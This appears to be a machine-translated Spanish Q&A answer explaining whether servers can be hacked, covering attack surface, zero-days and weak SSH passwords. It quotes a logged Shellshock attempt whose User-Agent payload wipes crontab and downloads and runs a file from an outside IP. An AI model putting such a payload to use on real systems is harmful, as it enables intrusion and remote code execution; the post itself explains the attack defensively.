A2A ¿Se puede hackear un servidor? Sí, cualquier cosa puede ser hackeada con buenas herramientas con acceso físico. Entonces, ¿se puede piratear un servidor a través de la red?
A veces.
Como tiene un servidor en una red, debe estar escuchando las solicitudes. Eso significa que hay una superficie de ataque: el conjunto de todas las solicitudes posibles que se pueden enviar, solo algunas de las cuales serán válidas. Si el servidor puede ser pirateado enviando una solicitud depende de si alguien cometió un error. No se garantiza que haya una vulnerabilidad que pueda ser explotada, pero cuanto más complejo es un sistema, más probable es. Los programadores y administradores cometen errores, o simplemente no piensan todo. Por ejemplo, un servidor web Apache con un sitio web estático (sin contenido activo) es bastante robusto; Hay millones en todo el mundo bajo ataque todo el tiempo, y se encuentran y corrigen errores. No es matemáticamente seguro que haya vulnerabilidades en un servidor, pero es estadísticamente probable.
- Con la mayoría de las grandes violaciones de datos corporativos, ¿se cifran los datos robados?
- ¿Qué antivirus es mejor: Avast o Kaspersky?
- ¿Cuál es la mejor manera de hackear un sistema en una red?
- ¿Por qué tengo tantos eventos de seguridad registrados con el usuario 'N / A'?
- ¿Cuál es un método garantizado para saber si un archivo PDF está libre de malware o para verlo de manera segura con gran confianza?
Aquí hay un ataque que tuve hace unos días:
Nombre de script CGI: /cgi-bin/php.cgi
Método de solicitud HTTP: GET
HTTP User-Agent: () {:;}; / usr / bin / perl -e ‘print “Content-Type: text / plain \ r \ n \ r \ nXSUCCESS!”; System (“crontab -r; cd / tmp /; mkdir pet-s-dragon; cd / tmp / pet-s-dragon; wget http://31.184.194.100/pets-dragon-v3.cam.torrent; perl pets-dragon-v3.cam.torrent
Es un intento de explotar el error Shellshock; El error existió entre 1989 y 2014, pero nadie lo descubrió. Desde que parcheé mi servidor en 2014, no es vulnerable a ese ataque en particular, pero podría ser vulnerable a otra cosa. Investigadores de seguridad, delincuentes y agencias gubernamentales trabajan para encontrar vulnerabilidades. Cuando los investigadores los encuentran, generalmente alertan a los encargados del mantenimiento del software que los reparan. Los delincuentes o las agencias gubernamentales pueden usarlos o sentarse en ellos. Si se usan ampliamente, todos lo sabrán y serán parcheados. Una vulnerabilidad conocida pero no revelada se conoce como día cero. Una agencia como la NSA podría usar un día cero como parte de una operación de vigilancia activa; si no lo usan en exceso y los objetivos no lo notan, puede permanecer oculto por algún tiempo.
A veces los servidores son vulnerables a la estupidez. Realmente no es piratería, pero los resultados son los mismos. Si ejecuta un servidor SSH en Internet con una contraseña raíz de “letmein”, o “t00r”, o cualquiera de las otras cien contraseñas comunes, se adivinará en unas pocas horas.